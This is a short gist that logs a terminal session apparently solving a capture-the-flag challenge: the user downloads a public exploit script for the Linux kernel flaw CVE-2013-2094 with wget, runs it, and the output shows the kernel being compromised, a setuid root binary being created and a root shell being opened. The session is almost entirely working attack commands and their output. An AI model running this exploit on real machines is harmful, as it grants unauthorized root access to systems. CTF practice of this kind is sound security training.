Gist kusano/8979286, created February 13, 2014 17:07
How to hack ctfq.sweetduet.info:10022
[q13@localhost hack]$ wget https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh
--2014-02-14 02:05:38-- https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh
Resolving raw.github.com... 103.245.222.133
Connecting to raw.github.com|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80790 (79K) [text/plain]
Saving to: “run.sh”
100%[================================================>] 80,790 --.-K/s in 0.02s
2014-02-14 02:05:38 (4.16 MB/s) - “run.sh” saved [80790/80790]
[q13@localhost hack]$ sh run.sh
Compiling exp_abacus.c...OK.
[+] Resolved set_fs_root to 0xc0555cf0 (via System.map)
[+] Resolved set_fs_pwd to 0xc0555c90 (via System.map)
[+] Resolved __virt_addr_valid to 0xc0438b10 (via System.map)
[+] Resolved init_task to 0xc0a425e0 (via System.map)
[+] Resolved init_fs to 0xc0a58320 (via System.map)
[+] Resolved default_exec_domain to 0xc0a48480 (via System.map)
[+] Resolved bad_file_ops to 0xc0851e60 (via System.map)
[+] Resolved bad_file_aio_read to 0xc0545440 (via System.map)
[+] Resolved ima_audit to 0xc0c31904 (via System.map)
[+] Resolved ima_file_mmap to 0xc05c7660 (via System.map)
[+] Resolved ima_bprm_check to 0xc05c7630 (via System.map)
[+] Resolved ima_file_check to 0xc05c7600 (via System.map)
[+] Resolved selinux_enforcing to 0xc0c2f498 (via System.map)
[+] Resolved selinux_enabled to 0xc0a5d7a0 (via System.map)
[+] Resolved security_ops to 0xc0c2e450 (via System.map)
[+] Resolved default_security_ops to 0xc0a5b9c0 (via System.map)
[+] Resolved sel_read_enforce to 0xc05b5140 (via System.map)
[+] Resolved audit_enabled to 0xc0bfc944 (via System.map)
[+] Resolved commit_creds to 0xc047d9e0 (via System.map)
[+] Resolved prepare_kernel_cred to 0xc047de10 (via System.map)
[+] Resolved xen_start_info to 0xc0b57004 (via System.map)
[+] Resolved ptmx_fops to 0xc0c367a0 (via System.map)
[+] Resolved mark_rodata_ro to 0xc0433300 (via System.map)
[+] Resolved set_kernel_text_ro to 0xc04333d0 (via System.map)
[+] Resolved make_lowmem_page_readonly to 0xc04055a0 (via System.map)
[+] Resolved make_lowmem_page_readwrite to 0xc0405560 (via System.map)
[+] Resolved perf_swevent_enabled to 0xc0c26000 (via System.map)
[+] Resolved ptmx_fops to 0xc0c367a0 (via System.map)
[!] Array base is 0xc0c26000
[!] Detected structure size of 4 bytes
[!] Targeting 0xc0c367b0
[+] Got ring0!
[+] Detected 2.6/3.x style 8k stacks, with current at 0xdca51550 and cred support
[+] Disabled security of : nothing, what an insecure machine!
[+] Found ->fs offset at 0x3ac
[+] Broke out of any chroots or mnt namespaces
[+] Got root!
[+] UID 0, EUID:0 GID:0, EGID:0
[+] Run ./suid "ls -la;id":
total 96
drwxrwxr-x 2 q13 q13 4096 Feb 14 02:05 .
drwxrwx-wt. 15 root root 4096 Feb 14 02:05 ..
-rw-rw-r-- 1 q13 q13 80790 Feb 14 02:05 run.sh
-rwsrwsr-x 1 root root 4892 Feb 14 02:05 suid
uid=0(root) gid=0(root) groups=0(root)
[q13@localhost hack]$ ./suid sh
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),507(q13)